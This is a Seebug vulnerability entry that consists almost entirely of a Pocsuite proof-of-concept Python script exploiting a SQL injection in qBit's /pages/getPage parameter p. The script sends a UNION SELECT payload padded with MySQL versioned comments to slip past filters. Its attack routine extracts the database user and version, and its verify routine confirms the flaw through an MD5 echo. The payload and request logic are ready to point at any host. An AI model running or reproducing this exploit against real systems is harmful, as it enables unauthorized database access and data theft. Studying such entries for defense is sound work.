qBit /pages/getPage parameter p SQL Injection

2016-09-03T00:00:00
ID SSV:92382
Type seebug
Reporter kikay
Modified 2016-09-03T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import re
import random
import hashlib

class TestPOC(POCBase):
    vulID = '1'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2016-08-19'
    createDate = '2016-08-22'
    updateDate = '2016-08-22'
    references = ['http://www.seebug.org/vuldb/ssvid-']
    name = 'qBit /pages/getPage parameter p SQL Injection'
    appPowerLink = 'N/A'
    appName = 'qBit'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
        qBit在页面/pages/getPage的参数p过滤不严,存在注入漏洞,可直接Union执行SQL指令。
    '''
    samples = ['']
    
    def _attack(self):
        #利用漏洞来获取数据库信息
        result = {}
        #利用的payload,读取数据库信息
        payload=('-parametr"/*ava*//*!50000UNION*//*ava*//*!50000SELECT*//*ava*//*!50000'
            'CONCAT*/(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24),2,3,4,5,6,7,8,9-- -" ')
        #漏洞连接
        exploit='/pages/getPage?p='
        #提取信息的正则表达式
        parttern="\$~~~\$(.*?)\*\*\*(.*?)\$~~~\$"
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #自定义超时
        time=50
        #构造访问地址
        vulurl=self.url+exploit+payload
        #尝试访问
        resp=req.get(url=vulurl,headers=httphead,timeout=time)
        #判断是否含有特征字符串
        if '$~~~$' in resp.content:
            #尝试提取信息
            match=re.search(parttern,resp.content,re.I|re.M)
            if match:
                #漏洞利用成功
                result['DataBaseInfo']={}
                #数据库当前用户名
                result['DataBaseInfo']['Username']=match.group(1)
                #数据库版本
                result['DataBaseInfo']['Version'] = match.group(2)             
        return self.parse_output(result)

    def _verify(self):
        #利用漏洞计算md5
        result = {}
        #生成随机数
        rand_num=random.randint(0,1000)
        #计算随机数的md5
        hash_flag=hashlib.md5(str(rand_num)).hexdigest()
        #利用的payload
        payload=('-parametr"/*ava*//*!50000UNION*//*ava*//*!50000SELECT*//*ava*/md5({num})'
            ',2,3,4,5,6,7,8,9-- -"').format(num=rand_num)
        #漏洞连接
        exploit='/pages/getPage?p='
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #自定义超时
        time=50
        #构造访问地址
        vulurl=self.url+exploit+payload
        #尝试访问
        resp=req.get(url=vulurl,headers=httphead,timeout=time)
        #判断是否含有特征字符串
        if hash_flag in resp.content:
            #漏洞验证成功
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)